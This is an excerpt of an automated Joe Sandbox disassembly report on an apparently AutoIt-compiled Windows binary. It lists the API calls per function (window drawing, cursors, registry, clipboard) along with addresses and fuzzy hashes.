                                                                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                  • _wcslen.LIBCMT ref: 00459916
                                                                                  • _wcscpy.LIBCMT ref: 0045993A
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                  • GetDC.USER32(00000000), ref: 004599FC
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                  • API String ID: 4040870279-2373415609
                                                                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                  • SelectObject.GDI32(?,?), ref: 00441874
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                  • DeleteObject.GDI32(?), ref: 004418D5
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                  • FillRect.USER32(?,?,?), ref: 00441970
                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                  • String ID:
                                                                                  • API String ID: 69173610-0
                                                                                  • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                  • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?), ref: 004590F2
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                  • API String ID: 2910397461-517079104
                                                                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 1038674560-3360698832
                                                                                  • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                  • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                  • SetCursor.USER32(00000000), ref: 0043075B
                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                  • SetCursor.USER32(00000000), ref: 00430773
                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                  • SetCursor.USER32(00000000), ref: 0043078B
                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                  • SetCursor.USER32(00000000), ref: 004307A3
                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                  • SetCursor.USER32(00000000), ref: 004307BB
                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                  • SetCursor.USER32(00000000), ref: 004307D3
                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                  • SetCursor.USER32(00000000), ref: 004307EB
                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                  • SetCursor.USER32(00000000), ref: 00430803
                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                  • SetCursor.USER32(00000000), ref: 0043081B
                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                  • SetCursor.USER32(00000000), ref: 00430833
                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                  • SetCursor.USER32(00000000), ref: 0043084B
                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                  • SetCursor.USER32(00000000), ref: 00430863
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                  • SetCursor.USER32(00000000), ref: 0043087B
                                                                                  • SetCursor.USER32(00000000), ref: 00430887
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                  • SetCursor.USER32(00000000), ref: 0043089F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load
                                                                                  • String ID:
                                                                                  • API String ID: 1675784387-0
                                                                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                  APIs
                                                                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                  • GetSysColor.USER32(00000012), ref: 00430933
                                                                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                  • GetSysColor.USER32(00000011), ref: 00430979
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1582027408-0
                                                                                  • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                  • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseConnectCreateRegistry
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 3217815495-966354055
                                                                                  • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                  • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 004566AE
                                                                                  • GetDesktopWindow.USER32 ref: 004566C3
                                                                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                  • DestroyWindow.USER32(?), ref: 00456746
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                  • CopyRect.USER32(?,?), ref: 004568BE
                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                  • String ID: ($,$tooltips_class32
                                                                                  • API String ID: 225202481-3320066284
                                                                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                  • String ID:
                                                                                  • API String ID: 15083398-0
                                                                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471DCF
